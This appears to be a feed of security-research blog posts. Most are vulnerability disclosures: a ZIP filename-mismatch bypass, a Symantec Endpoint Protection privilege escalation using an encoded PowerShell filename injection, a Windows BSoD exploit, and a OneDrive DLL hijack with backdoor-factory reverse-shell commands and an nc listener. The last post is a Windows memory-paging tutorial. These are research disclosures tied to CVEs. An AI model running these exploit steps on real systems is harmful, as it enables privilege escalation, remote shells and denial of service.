          general purpose bit flag        2 bytes
          compression method              2 bytes
          last mod file time              2 bytes
          last mod file date              2 bytes
          crc-32                          4 bytes
          compressed size                 4 bytes
          uncompressed size               4 bytes
          file name length                2 bytes
          extra field length              2 bytes
          file comment length             2 bytes
          disk number start               2 bytes
          internal file attributes        2 bytes
          external file attributes        4 bytes
          relative offset of local header 4 bytes

          file name (variable size)
          extra field (variable size)
          file comment (variable size)

Did you see that? The file name can be found in two places . In local file header and in central directory structure under the File header

I was trying to find which file name I MUST use, when I extract the .zip file, but I was not able to find anything. This makes me wonder, what will happen if a zip archive contains one file name in the Local file header and a different one in File header of the central directory structure?

In order to test that, I created a .ZIP file which uses the file name “test.txt” in the local file header and the file name “test.exe” in the File header. The file is the same. The file is an executable. The only difference is the file name .

part of gweeperx.zip

I have highlighted the hex values which indicate the start of the local file header and the one of the file header respectively. I have also highlighted the different file names.

I tested the above .ZIP file with different programs, libraries and sites.

It seems, that the (default/pre-installed) programs which are being used in order to unzip .ZIP files, in Linux and Windows, as well as the majority of the commercial and non commercial products, are mostly based on the file name which exists in the file header and not in the local file header .

However, there are exceptions in this rule. In fact there are many exceptions. Dropbox and JSZip (A library for creating, reading and editing .ZIP files with JavaScript, with more than 3.000.000 downloads weekly) are only two of them.

Dropbox

As it is presented, when we preview the .ZIP file in Dropbox, we can see that it contains a file with file name test.txt. However, when we download it we see another file name, the test.exe .

JSZip

The same with JSZip. As we can observe, when we read the contents of the zip archive, we find a text file. However, when we extract it, we have an executable. The unzip detects that there is a different file name in the file header and a different one in the local file header

Linux

I didn’t see that coming. If you drag and drop the file, you get a test.exe . However, if you choose to extract the contents you get a test.txt

This behavior can lead to major vulnerabilities, and we would be more than happy to hear your story or idea, if you come up with something.

One scenario would be the following:

Let’s assume that a zip archive contains an executable, the test.exe. The .ZIP uses the file name “test.txt” in the “Local file header” and “test.exe” in the “file header” .
A site owner does not allow .ZIP files containing “*.exe” files to be uploaded to her server, so her web application checks with JSZip that the .ZIP does not contain files with “.exe” extension.
The JSZip, will report that the .ZIP contains the text file “test.txt” and thus the web application will allow the user to upload it.
However, if the web application does not extract .ZIP file with the JSZip, but instead of that, the site owner sends by e-mail these .ZIP files, or she does the extraction with the default windows unzip or with winrar or with the linux unzip, the “test.exe” is extracted.

What could possibly go wrong?

Resources

GitHub

Visit our GitHub at https://github.com/RedyOpsResearchLabs/

RedyOps team

RedyOps team, uses the 0-day exploits produced by Research Labs, before vendor releases any patch. They use it in special engagements and only for specific customers.

You can find RedyOps team at https://redyops.com/

Angel

Discovered 0-days which affect marine sector, are being contacted with the Angel Team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel’s business, IoT and crew networks by providing oversight, security threat alerting and control of the vessel’s entire network.

You can find Angel team at https://angelcyber.gr/

Illicium

Our 0-days cannot win Illicium. Today’s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malwares, APTs and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers’ evolution, defenders now have a new kind of weapon in their arsenal: Deception.

You can find Illicium team at https://deceivewithillicium.com/

Neutrify

Discovered 0-days are being contacted to the Neutrify team, in order to develop related detection rules. Neutrify is Neurosoft’s 24×7 Security Operations Center, completely dedicated to threats monitoring and attacks detection. Beyond just monitoring, Neutrify offers additional capabilities including advanced forensic analysis and malware reverse engineering to analyze incidents.

You can find Neutrify team at https://neurosoft.gr/contact/

The post Spending a night reading the .ZIP File Format Specification appeared first on REDYOPS Labs.

1-click RCE on Keybase

27 April 2020 at 18:00
TL;DR Keybase clients allowed to send links in chats with arbitrary schemes and arbitrary display text. On Windows it was possible to send an apparently harmless link which, when clicked, could execute arbitrary commands on the victim’s system. Introduction Keybase is a chat, file sharing, git, * platform, similar to Slack, but with a security in-depth approach. *Everything* on Keybase is encrypted, allowing you to relax while syncing your private files on the cloud.

Symantec Endpoint Protection (SEP) 14.2 RU2 Elevation of Privileges (CVE-2020-5837)

By: admin
27 April 2020 at 10:06

Summary

Assigned CVE: CVE-2020-5837 has been assigned and RedyOps Labs has been publicly acknowledged by the vendor.

Known to Neurosoft’s RedyOps Labs since: 22/12/2019

Exploit Code: https://github.com/RedyOpsResearchLabs/SEP-14.2-Arbitrary-Write

Vendor’s Advisory: https://support.broadcom.com/security-advisory/security-advisory-detail.html?notificationId=SYMSA1762

An Elevation of Privilege (EoP) exists in SEP 14.2 RU2 . The latest version we tested is SEP Version 14(14.2 RU2 MP1) build 5569 (14.2.5569.2100). The exploitation of this EoP , gives the ability to a low privileged user to create a file anywhere in the system. The attacker partially controls the content of the file. There are many ways to abuse this issue. We chose to create a bat file in the Users Startup folder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\backdoor.bat because we believe it is a good opportunity to present an interesting method we used, in order to bypass restrictions of this arbitrary write where we could control only partially the content .

Description

Whenever Symantec Endpoint Protection (SEP) performs a scan, it uses high privileges in order to create a log file under the folder

C:\Users\user\AppData\Local\Symantec\Symantec Endpoint Protection\Logs\

An attacker can create a SymLink in order to write this file anywhere in the system. As for example the following steps will force SEP to create the log file under the

“C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\backdoor.bat”

  1. Delete the “Logs” sub folder (Shift+Delete) from the  “C:\Users\attacker\AppData\Local\Symantec\Symantec Endpoint Protection\” folder.  
  2. Execute the following:
CreateSymlink.exe "C:\Users\attacker\AppData\Local\Symantec\Symantec Endpoint Protection\Logs\12222019.Log" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\backdoor.bat"

Note: The file 12222019.Log is in format mmddyyyy.log . Depending on the day you exploit, you have to choose the right name.

CreateSymlink is opensource and can be found in the following URL: https://github.com/googleprojectzero/symboliclink-testing-tools/releases .

The log files contain data which are partially controlled by the attacker, allowing commands to be injected into the log files. With symbolic links, we can write log files in other file formats which can lead to an EoP.

An easy way to inject code in the log files, is by naming a malicious file to

m&command&sf.exe

and scan it. This will trigger the scan and a log entry with the injected command will be created. This is caused because the filename “m&command&sf.exe” of the malicious file is being referenced in the log files. Combining this with the SymLinks, the attacker can create the valid bat file  “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\backdoor.bat” .

Exploitation

In order to Exploit the issue you can use our exploit from our GitHub .

In the following paragraph a step by step explanation of the Video PoC where we use the exploit, is provided.

Video PoC Step By Step

The exploit takes 2 arguments. The first argument is the file we want the logs to be written in. The second argument, is the payload we want to inject in the logs file. If you can recall, the “payload” we are going to inject is nothing more than the filename of the malicious file which we are going to scan. So the following command will cause the SEP to create its log file to

c:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\backdoor.bat

and the malicious file we are going to scan, will have the name

“& powershell.exe -Enc YwBtAGQALgBlAHgAZQAgAC8AQwAgAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAMQAuAGUAeABlAA== & REM”

Yes i know… this is a strange name for a file, but it is what it is 🙂

Exploit.exe "c:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\backdoor.bat" "& powershell.exe -Enc YwBtAGQALgBlAHgAZQAgAC8AQwAgAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAMQAuAGUAeABlAA== & REM"

If you decode the base64 you will have the command cmd.exe /C C:\Users\Public\1.exe

A user with low privileges can copy any file under the C:\Users\Public\ folder.


00:00 – 00:43: We present the environment; a user with low privileges, the windows version, the SEP version and the DACL of the “StartUp” folder.

00:43 – 01:18: We run the exploit. The file backdoor.bat is created and its content contains our payload.

01:18 – 01:48: We copy the calculator to C:\Users\Public\1.exe . The payload will execute anything in C:\Users\Public\1.exe . We copied the calculator for the PoC, but you can put any executable you want.

01:48 – end: When a user logs into the system (an administrator in the PoC), the file c:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\backdoor.bat is executed. This file contains lines of content, which are not valid commands. However, our payload is a valid command and it will be executed. As result powershell will execute the cmd.exe /C C:\Users\Public\1.exe and the calculator (1.exe) pops up.

It is worth mentioning, that we can also write to files which already exist. As for example we can write the contents of the log files in the C:\windows\win.ini file. This is useful if you want to delete a file. Name your malicious file, with a malicious filename and the AV will do the rest for you 🙂 .

Resources

GitHub

You can find the exploit code in our GitHub at https://github.com/RedyOpsResearchLabs/SEP-14.2-Arbitrary-Write

RedyOps team

RedyOps team, uses the 0-day exploits produced by Research Labs, before vendor releases any patch. They use it in special engagements and only for specific customers.

You can find RedyOps team at https://redyops.com/

Angel

Discovered 0-days which affect marine sector, are being contacted with the Angel Team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel’s business, IoT and crew networks by providing oversight, security threat alerting and control of the vessel’s entire network.

You can find Angel team at https://angelcyber.gr/

Illicium

Our 0-days cannot win Illicium. Today’s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malwares, APTs and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers’ evolution, defenders now have a new kind of weapon in their arsenal: Deception.

You can find Illicium team at https://deceivewithillicium.com/

Neutrify

Discovered 0-days are being contacted to the Neutrify team, in order to develop related detection rules. Neutrify is Neurosoft’s 24×7 Security Operations Center, completely dedicated to threats monitoring and attacks detection. Beyond just monitoring, Neutrify offers additional capabilities including advanced forensic analysis and malware reverse engineering to analyze incidents.

You can find Neutrify team at https://neurosoft.gr/contact/

The post Symantec Endpoint Protection (SEP) 14.2 RU2 Elevation of Privileges (CVE-2020-5837) appeared first on REDYOPS Labs.

Windows Denial of Service Vulnerability (CVE-2020-1283)

By: admin
27 April 2020 at 09:54

Summary

Assigned CVE: CVE-2020-1283 has been assigned and RedyOps Labs has been publicly acknowledged by the vendor.

Known to Neurosoft’s RedyOps Labs since: 11/03/2020

Exploit Codehttps://github.com/RedyOpsResearchLabs/CVE-2020-1283_Windows-Denial-of-Service-Vulnerability

Vendor’s Advisory: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1283

This issue has the following description on Microsoft’s advisory:

” A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding.

To exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application or to convince a user to open a specific file on a network share. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to cause a target system to stop responding.

The update addresses the vulnerability by correcting how Windows handles objects in memory.”

We will use a different description, based on the exploit we provided to Microsoft in order to abuse this vulnerability. Our description, may not be technically as accurate as Microsoft’s description, but our approach may allow someone out there to take this vulnerability beyond the DOS.

An arbitrary folder creation exists on Windows 10 1909. This specific case allows a user with low privileges to create an empty folder, with any chosen name, anywhere in the system. The folders we create inherit their DACL and thus we couldn’t find a way to exploit the issue in order to perform an Escalation of Privilege. However, we are able to exploit any arbitrary file/folder creation in order to cause a Blue Screen of Death (BSoD). The latest version we tested is windows 10 1909 (OS Build 18363.778) 64bit .

Description

A user with low privileges (the “attacker”), has full control over the folder c:\Users\attacker\AppData\Roaming\Microsoft\Windows . This, allows him to rename the folder to c:\Users\attacker\AppData\Roaming\Microsoft\Windows2 .

If a user/attacker performs the aforementioned rename action, there are specific circumstances and actions which can be followed in order to force the NT AUTHORITY\SYSTEM to recreate the following folders:

  • c:\Users\attacker\AppData\Roaming\Microsoft\Windows\Recent
  • c:\Users\attacker\AppData\Roaming\Microsoft\Windows\Libraries

An attacker, can replace those folders with symlinks pointing to a non-existent folder somewhere in the system. When the NT AUTHORITY\SYSTEM tries to recreate the folders “Recent” and “Libraries”, will follow those symlinks and will create the non-existent folder. This way the attacker can create a folder with a chosen name, anywhere in the system.

Exploitation

  1. Login with a user with low privileges. Assume this user has the username “attacker”.
  2. Rename the folder C:\Users\attacker\AppData\Roaming\Microsoft\Windows to C:\Users\attacker\AppData\Roaming\Microsoft\Windows2
  3. Run the Exploit.exe (you can find the code on our GitHub) and use as arguments the two folders you want to create. As for example:
Exploit.exe c:\windows\system32\cng.sys c:\windows\addins\whateverFolder

The exploit assumes that your username is attacker. If you want to use another username, change the hard-coded paths to the exploit code and recompile.

  1. Click the Start Button and open the “Microsoft Solitaire Collection” or “Xbox Game Bar” from the right panel. Usually one of both will trigger the creation of the arbitrary folders.
  2. Check that the folders have been created.

The creation of the folder c:\windows\system32\cng.sys will cause a DoS in the next reboot and the system will need to be repaired.

Video PoC Step By Step

The exploit takes 2 arguments. These are the two folders we want to create. As for example

Exploit.exe c:\windows\system32\folder1 c:\windows\addins\folder2

will create the folders c:\windows\system32\folder1 and c:\windows\addins\folder2 . However, you will not be able to write anything inside those folders.

00:00-00:30: Presentation of the environment. We present the user with the low privileges and the fact that the folders c:\windows\system32\cng.sys c:\windows\addins\whateverFolder do not exist in the system.

00:30 – 00:49: We run the Exploit, but it fails because we have not renamed the C:\Users\attacker\AppData\Roaming\Microsoft\Windows . First we have to rename this folder.

00:49 – 01:22: We rename the folder C:\Users\attacker\AppData\Roaming\Microsoft\Windows to C:\Users\attacker\AppData\Roaming\Microsoft\Windows2 and we run the exploit again. At this point, the exploit will create all the appropriate symlinks.

01:22 – 02:17: We open the “Xbox Game Bar” which triggers the creation of the Libraries and Recent folders. As we can observe in the Explorer, the folder c:\windows\system32\cng.sys was created. We present that both folders , c:\windows\system32\cng.sys and c:\windows\addins\whateverFolder, have been created and the owner is the “Administrators”.

02:17 – end: We reboot the system and we have the BSoD. The BSoD is caused because of the folder c:\windows\system32\cng.sys. If you choose a folder with another name, it will not cause the BSOD.

If you find a better way to use this primitive and you are willing to share, we would love to hear from you or read your write-up.

Resources

GitHub

You can find the exploit code on our Github at https://github.com/RedyOpsResearchLabs/

RedyOps team

RedyOps team, uses the 0-day exploits produced by Research Labs, before vendor releases any patch. They use it in special engagements and only for specific customers.

You can find RedyOps team at https://redyops.com/

Angel

Discovered 0-days which affect marine sector, are being contacted with the Angel Team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel’s business, IoT and crew networks by providing oversight, security threat alerting and control of the vessel’s entire network.

You can find Angel team at https://angelcyber.gr/

Illicium

Our 0-days cannot win Illicium. Today’s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malwares, APTs and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers’ evolution, defenders now have a new kind of weapon in their arsenal: Deception.

You can find Illicium team at https://deceivewithillicium.com/

Neutrify

Discovered 0-days are being contacted to the Neutrify team, in order to develop related detection rules. Neutrify is Neurosoft’s 24×7 Security Operations Center, completely dedicated to threats monitoring and attacks detection. Beyond just monitoring, Neutrify offers additional capabilities including advanced forensic analysis and malware reverse engineering to analyze incidents.

You can find Neutrify team at https://neurosoft.gr/contact/

The post Windows Denial of Service Vulnerability (CVE-2020-1283) appeared first on REDYOPS Labs.

OneDrive < 20.073 Escalation of Privilege

By: admin
27 April 2020 at 07:30

Summary

Assigned CVE: Microsoft has publicly acknowledged and patched the issue. However, when we asked for the CVE number, Microsoft replied to us that the purpose of a CVE is to advise customers on the security risk and how to take action to protect themselves. Microsoft issues CVEs for MS products that require users to take action to update their environments . Although we have seen CVEs for OneDrive in the past, we respect their decision not to issue a CVE number.

Known to Neurosoft’s RedyOps Labs since: 31/03/2020

Exploit Codehttps://github.com/RedyOpsResearchLabs/OneDrive-PrivEsc

Vendor’s Acknowledgement : https://portal.msrc.microsoft.com/en-us/security-guidance/researcher-acknowledgments-online-services (March 2020)

Important note regarding the patch:  Ensure that you have OneDrive >= 20.073. If you don’t, you can download the Rolling out version of the Production Ring (20.084.0426.0007), from this link  https://go.microsoft.com/fwlink/?linkid=860984 

An Escalation of Privileges (EoP) exists in OneDrive < 20.073. The latest version we tested is OneDrive 19.232.1124.0012 and Insider Preview version 20.052.0311.0010 . The exploitation of this EoP , gives the ability to a user with low privileges to gain access as any other user. In order for the exploitation to be successful, the targeted user must interact with the OneDrive (e.g right click on the tray icon) in order for the attacker to gain access .

Description

The vulnerability arises because the OneDrive is missing some QT folders and tries to locate them from C:\QT. The C:\QT folder does not exist by default and any user with low privileges can create it. If an attacker creates the file C:\Qt\Qt-5.11.1\qml\QtQuick.2.7\qmldir with the following contents:

module QtQuick 
plugin qtquick2plugin 
classname QtQuick2Plugin 
typeinfo plugins.qmltypes 
designersupported

The OneDrive will try to load the C:\Qt\Qt-5.11.1\qml\QtQuick.2.7\qtquick2plugin.dll . As far as the attacker can place a backdoor in the qtquick2plugin.dll , the OneDrive will load the backdoor.

Exploitation

The exploit can be found in our GitHub.

Today, the provided backdoor is being detected by Defender. Bypassing Defender is not the scope of this blog-post. Our purpose is not to bypass the defender AV but to provide a Proof of Concept (PoC) of the EoP. Thus first add an exception to the Defender for the folder C:\QT (or for the provided backdoor file qtquick2plugin.dll )

  1. Login as a low privileged user
  2. Close your OneDrive
  3. Copy paste the provided QT folder under the C: drive. After the copy paste, you should have the following files in your system:
  • C:\Qt\Qt-5.11.1\qml\QtQuick.2.7\qtquick2plugin.dll (This the qtquick2plugin.dll in which we have added a backdoor for reverse shell)
  • C:\Qt\Qt-5.11.1\qml\QtQuick.2.7\qmldir
  • C:\Qt\Qt-5.11.1\qml\QtQuick.2.7\qtquick2plugin.dll.org (this file is not needed. It’s the original qtquick2plugin.dll file.

In order for the exploitation to take place, the victim must login into the system and interact with the OneDrive. If you want to verify the exploitation perform the following:

  1. Logout
  2. Login as another user. For example perform a login as an Administrator.
  3. Right click on the tray icon of the OneDrive
  4. You should receive a reverse shell from the Administrator to your C2C.

The provided qtquick2plugin.dll contains a reverse shell which has been configured to return to the ip address 192.168.2.3 and port 8080 .

Supporting materials

In order to backdoor the qtquick2plugin.dll , we used the following:

  1. The original file qtquick2plugin.dll (you can find one under the folder “C:\Users\youruser\AppData\Local\Microsoft\OneDrive\19.232.1124.****\qml\QtQuick.2\” )
  2. the the-backdoor-factory from https://github.com/secretsquirrel/the-backdoor-factory
  3. Create the backdoor with the following command line:

./backdoor.py -f qtquick2plugin.dll -H ip -P port -s reverse_shell_tcp_inline -a

Wait for the reverse shell with a netcat “nc -nlvp port”

Video PoC

Resources

GitHub

You can find the exploit code in our Github at https://github.com/RedyOpsResearchLabs/

RedyOps team

RedyOps team, uses the 0-day exploits produced by Research Labs, before vendor releases any patch. They use it in special engagements and only for specific customers.

You can find RedyOps team at https://redyops.com/

Angel

Discovered 0-days which affect marine sector, are being contacted with the Angel Team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel’s business, IoT and crew networks by providing oversight, security threat alerting and control of the vessel’s entire network.

You can find Angel team at https://angelcyber.gr/

Illicium

Our 0-days cannot win Illicium. Today’s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malwares, APTs and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers’ evolution, defenders now have a new kind of weapon in their arsenal: Deception.

You can find Illicium team at https://deceivewithillicium.com/

Neutrify

Discovered 0-days are being contacted to the Neutrify team, in order to develop related detection rules. Neutrify is Neurosoft’s 24×7 Security Operations Center, completely dedicated to threats monitoring and attacks detection. Beyond just monitoring, Neutrify offers additional capabilities including advanced forensic analysis and malware reverse engineering to analyze incidents.

You can find Neutrify team at https://neurosoft.gr/contact/

The post OneDrive < 20.073 Escalation of Privilege appeared first on REDYOPS Labs.

Turning the Pages: Introduction to Memory Paging on Windows 10 x64

26 April 2020 at 00:00

Introduction

0xFFFFFFFF11223344 is an example of a virtual memory address, and anyone who spends a lot of time inside of a debugger may be familiar with this notion. “Oh, that address is somewhere in memory and references X” may be an inference that is made about a virtual memory address. I always wondered where this address schema came from. It wasn’t until I started doing research into kernel mode mitigation bypasses that I realized learning where these virtual addresses originate from is a very important concept. This blog will by no means serve as a complete guide to virtual and physical memory in Windows, as it could EASILY be a multi series blog post. This blog is meant to serve as the prerequisite knowledge needed to do things like change permissions of a memory page in kernel mode with a vulnerability such as a write-what-where bug to bypass kernel mitigations such as SMEP or NonPagedPoolNx through page table entries.

Let’s dive into memory paging, and see where these virtual memory addresses originate from and what we can learn from these seemingly obscured 8 bytes we stumble across so copiously.

Firstly, before we begin, if you want a full fledged low level explanation of nearly every aspect of memory in Windows (which far surpasses the scope of this blog post) I HIGHLY suggest reading What Makes It Page?: The Windows 7 (x64) Virtual Memory Manager written by Enrico Martignetti. In addition to paging, we will look at some ways we can use WinDbg to automate some of the more admittedly cumbersome steps in the memory paging process.

Paging? ELI5?

Memory paging refers to the implementation of virtual memory by the MMU (memory management unit). Virtual memory is mapped to physical memory, known as RAM (and in some cases, actually to disk temporarily if physical memory needs to be optimized elsewhere).

One of the main reasons that memory paging is generally enabled, is the concept of “resource sharing”. For example, if we have two instances of the calc.exe - these two instances can share physical memory. Sharing physical memory is very important, as RAM is an expensive resource.

Take a look at the below image, from the Windows Internals, Part 1 (Developer Reference) 7th Edition book to get a better understanding visually of virtual to physical memory mapping.

In addition to this information, it is important to note that a physical memory page is generally 4 KB (2 MB and even 1 GB pages can be addressed, but that is beyond the scope of this blog) in size on x64 Windows. We will see how this comes to fruition in upcoming sections of this post.

Before diving straight in to some of the lower level details, it is important to note there are a few different “paging modes” that can be utilized. Paging modes refer to the way paging is executed. The paging mode we will be referring to and using (as is default on basically every x64 version of Windows) is Long-Mode Paging.

Are We There Yet?

If we want to understanding WHAT paging actually does, let’s take a look a moment and analyze how paging is actually enabled! Looking at some of the control registers will show us if/how paging is enabled and what paging mode are we using.

According to the Intel 64 and IA-32 Architectures Software Developer’s Manual, the CR0 register is responsible for paging being enabled.

CR0.PG refers to the 31st bit of the CR0 register. If this bit is set to 1, paging is enabled. If it is set to 0, paging is disabled.

The above image is from a default installation of Windows 10 x64, showing the 31st bit of the CR0 bit is set to 1.

We now know that paging is enabled based on the image above - but what kind of paging are we using? Referring again to the Intel manual, we notice that the CR4 control register is responsible for implementing the paging mode we are using.

As mentioned previously, the paging mode we are using is called Long-Mode Paging. Long-Mode Paging is another way of saying that Physical Address Extension, or PAE, is enabled. PAE enables 64-bit paging. If PAE was disabled, only 32-bit paging would be possible.

The 5th bit of the CR4 register is responsible for PAE being enabled. 1 = enabled, 0 = disabled.

We can also see, on a default installation of Windows 10 x64, PAE is enabled by default.

Now that we know how to identify IF and WHAT KIND of paging is enabled, let’s get into virtual to physical address translation!

Let’s Get Physical!

The easiest way to think about a virtual memory address, and where it comes from, is to look at it from a different perspective. Don’t take it at face value. Understanding what the virtual address is trying to accomplish, will surely shed some light on this whole process.

A virtual address is simply a computation of various indexes into several paging structures used to fetch the corresponding physical page to a virtual page.

Take a look at the image below, taken from the AMD64 Architecture Programmer’s Manual Volume 2.

Although this image above looks very intimidating, let’s break it down.

As we can see, the virtual address in this case is a 64-bit virtual address. The first portion of the address, bits 63-48, are represented as “Sign Extend”. Let’s leave this on the back burner for the time being.

We can see there are four paging structures in use:

  1. Page-Map Level-4 Table (PML4) (Bits 47-39)
  2. Page-Directory-Pointer Table (PDPT) (Bits 38-30)
  3. Page-Directory Table (PDT) (Bits 29-21)
  4. Page Table (PT) (Bits 20-12)

Each 8 bits of a virtual address (47-39, 38-30, 29-21, 20-12, 11-0) are actually just indexes of various paging structure tables.

In addition, each paging structure table contains 512 page table entries (PxE).

So in totality, each paging structure is really a table with 512 entries each.

For each physical memory page the MMU wants to attribute to a virtual memory page, the MMU will access an entry from each table (a page table entry) that will “lead us” to the next paging structure in line.This process will go on, until a final 4 KB physical page (more on this later) is retrieved.

Think of it as needing to pick a specific entry from each table to reach our final 4 KB physical memory page. We will get into some very high level mathematical computations on how this is done later, and seeing the exact anatomy of a virtual address in WinDbg.

Now that we have some high level understanding of the various paging structures, and before diving into the paging structures and the CR3 register (PML4, I am looking at you) - let’s circle back to bits 63-48, which are represented as “Sign Extend

Canonical Addressing

In a 64-bit architecture, each virtual memory address has a total of 8 bytes, compared to a 4 byte x86 virtual memory address.

Referring back to the above section, we can recall that bits 63-48 are not accessing any paging structures. What is the purpose of this? It has to do with the limitations of the MMU.

Technically, a 64-bit system only uses 48 bits of its total power. This is because if a 64-bit system allowed all 64 bits to be addressed, the system would need to be able to address 16 exabytes of total virtual memory. 1 exabyte is equivalent to 1000000 terabytes (TB). The MMU would not be able to keep track of all of this from a translations perspective firstly (efficiently), and secondly (and most importantly) systems today cannot support this much virtual memory.

The CPU implements a “governor” of sorts, which limits 64-bit addresses to 48-bit addresses. An address in which bits 63-47 are sign extended is known as a canonical address.

Sign extending bits 63-47 limits the virtual address space to 256 TB of RAM. This is still a lot, but it is still feasible.

Let’s take a look to see how this all breaks down.

Referencing the Intel manual again, sign extending occurs in the following manner. Bit 47 is responsible for what bits 63-47 will be set to.

If bit 47 is set to 0, bits 63-48 will also be set to 0. If bit 47 is set to 1, bits 63-48 will be set to 1 (resulting in hexadecimal F’s in the virtual address).

The below chart, from Intel shows what addresses are valid and what addresses are invalid, in accordance with canonical addressing and sign extending. Note that we are only interested in the 48-bit addressing chart. 56-bit addressing refers to level 5 paging and 64-bit addressing refers to using the whole 64-bit address space.

Let’s look at two examples below.

The first example is the address KERNELBASE!VirtualProtect which has a virtual memory address of 00007ffce032cfc0. Breaking the address down into binary, we can see bit 47 is set to 0. Subsequently, bits 63-48 are also set to 0.

Generally, user mode addresses are going to be sign extended with a 0.

Taking a look at a kernel mode address, nt!MiGetPteAddress, we can see in this case bit 47 is set to 1. Meaning bits 63-48 are also set to 1, resulting in all hexadecimal F’s occurring in the virtual address as seen below.

Now that we see how addressing is limited, let’s get into the breakdown of a virtual address.

(Question to you, the reader. Now that we know 64-bit systems only utilize 48 bits, do you see a clear need for 128-bit processors in the near future?)

The Anatomy of a Virtual Address (In All of Its Glory)

Let’s talk about paging structures and page table entries once again before we get into breaking down a virtual address.

Recall there are 4 main paging structures:

  1. Page-Map Level-4 Table (PML4)
  2. Page-Directory-Pointer Table (PDPT)
  3. Page-Directory Table (PDT)
  4. Page Table (PT)

As a point of contention, a page table entry for each of these structures removes the “T” from the acronym and replaces it with an “E”. For instance, an entry from the PDT is known as a PDE. An entry from the PT is known as a PTE and so on.

Recall that each one of these structures is a table that has 512 entries each. One PML4E can address up to 512 GB of memory. One PDPE can address 1 GB. One PDE can address 2 MB. Finally, one PTE can map 4 KB, or a physical memory page.

Note that the actual size of each entry is 8 bytes (the size of a virtual memory address in a 64-bit architecture).

Let’s talk about PML4 table briefly, which cannot be talked about without mentioning the CR3 register.

The CR3 register actually contains a physical memory address, which actually serves as the PML4 table base. This can be seen in the image below, where CR3 loads an actually physical memory address.

This is how the paging process begins, as the PML4 can be fetched from the CR3 register.

Again, to reiterate, The PML4 (via the CR3 register) indexes the PDPT table and fetches an entry. The PDPT indexes the base of the PDT table and fetches an entry. The PDT table indexes the PT table and fetches a 4 KB physical memory page.

Before moving on, there is one special thing to note, and that is the actual page table (PT).

Once the page table (PT) has been indexed in bits 20-12, bits 11-0 no longer need to fetch an index from any other paging structures. Bits 11-0 actually serve as an offset to a physical memory page 4 KB in size. Recall that an offset is the distance between two places (generally from a base, the PT in this case, to another location). Bits 11-0 simply serve as the actual distance from the page table base to the actual location of the physical memory. We will see this outlined very shortly when we perform a page translation in WinDbg.

Now that we understand at a bit of a lower level how each paging structure is indexed, let’s take it an even lower level.

Finally, an Example!

VirtualAlloc() is a routine in Windows that creates a region of virtual memory and returns a pointer to this virtual memory.

In our example, the virtual memory address 510000 is a virtual memory address that was created by KERNELBASE!VirtualAlloc. Let’s run the !pte command in WinDbg to see what we are working with here.

One thing to notate before moving on, WinDbg references a few paging structures and entries a bit differently. Namely, they are:

  1. PXE = PML4E
  2. PPE = PDPE

Moving on, we can see each structure’s entries can all be found at their respective virtual addresses, shown above as:

  1. PML4E at FFFFF6FB7DBED000
  2. PDPE at FFFFF6FB7DA00000
  3. PDTE at FFFFF6FB40000010
  4. PTE at FFFFF68000002880

This is because the !pte output converts the entries to virtual addresses before being displayed. We don’t care so much about the virtual addresses (for the time being) because we are trying to see how virtual addresses are converted into physical addresses.

In order to reach our goal, right now we only care about pfn which we can see from the !pte output. Let’s understand the pfn means firstly, as this will help us understand the output of !pte and fetching a physical page associated with a virtual page.

A PFN, or page frame number, refers to the next paging structure in the hierarchy. PFNs work with PTEs, in that PTEs fetch the PFN for the next paging structure. That PFN is then multiplied by 0x1000 (4 KB) to retrieve the physical address of the next paging structure. We will hit more on this now.

In the output of !pte we see there is a PML4E. A PML4E , as we know, will fetch the base address of the PDPT table. From there, it will index an entry from the next table, known as a PDPE.

The PFN, as we can see from the output in WinDbg in the earlier screenshot, that PML4 is using to index the PDPT table is 7bbc8. This means this should be the page frame number for the PDPT, as we know a page frame number refers to the next paging structure in the hierarchy.

We will now use !vtop to convert the PDPT to a physical address to verify that the PML4E entry is indexing the correct paging structure.

Let’s breakdown this command firstly.

The 7be59000 value in the above command is the base paging structure in the CR3 register, the PML4 physical address. When using !vtop, you use this address to specify the base paging structure. After that, we have the virtual address we want to convert.

As we can see, the PDPT is located at a physical address of 7bbc8000! This is perfect, because this is the PFN value used by the PML4 structure to index the next paging structure, PDPT. Recall earlier, that we multiply the PFN (7bbc8 in this case) by 0x1000, which gives us a physical memory address of 7bbc8000 - which represents the PDPT.

Let’s verify in WinDbg with !dd, which will dump physical memory, that the virtual address of the PDPE and the physical address both are the same.

As we can see, the physical and virtual memory addresses contain the same values.

Too Many Acronyms!

This is an ideal example to show that a physical page of memory is actually NOTHING MORE than a PFN multiplied by 0x1000 and an offset to the physical memory page! A PFN, as we can recall, is a reference to the base of the next paging structure.

